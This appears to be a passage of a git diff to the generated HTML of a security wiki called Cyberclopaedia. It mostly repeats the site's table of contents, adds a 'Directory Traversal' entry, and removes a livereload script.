        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -320,22 +320,6 @@

Leap of Faith - - diff --git a/docs/Cryptography/Primitives/Pseudorandom Permutations (PRPs).html b/docs/Cryptography/Primitives/Pseudorandom Permutations (PRPs).html index b021d552..2cf6455a 100644 --- a/docs/Cryptography/Primitives/Pseudorandom Permutations (PRPs).html +++ b/docs/Cryptography/Primitives/Pseudorandom Permutations (PRPs).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -284,22 +284,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Primitives/index.html b/docs/Cryptography/Primitives/index.html index c0ac2ce9..6acc0b72 100644 --- a/docs/Cryptography/Primitives/index.html +++ b/docs/Cryptography/Primitives/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
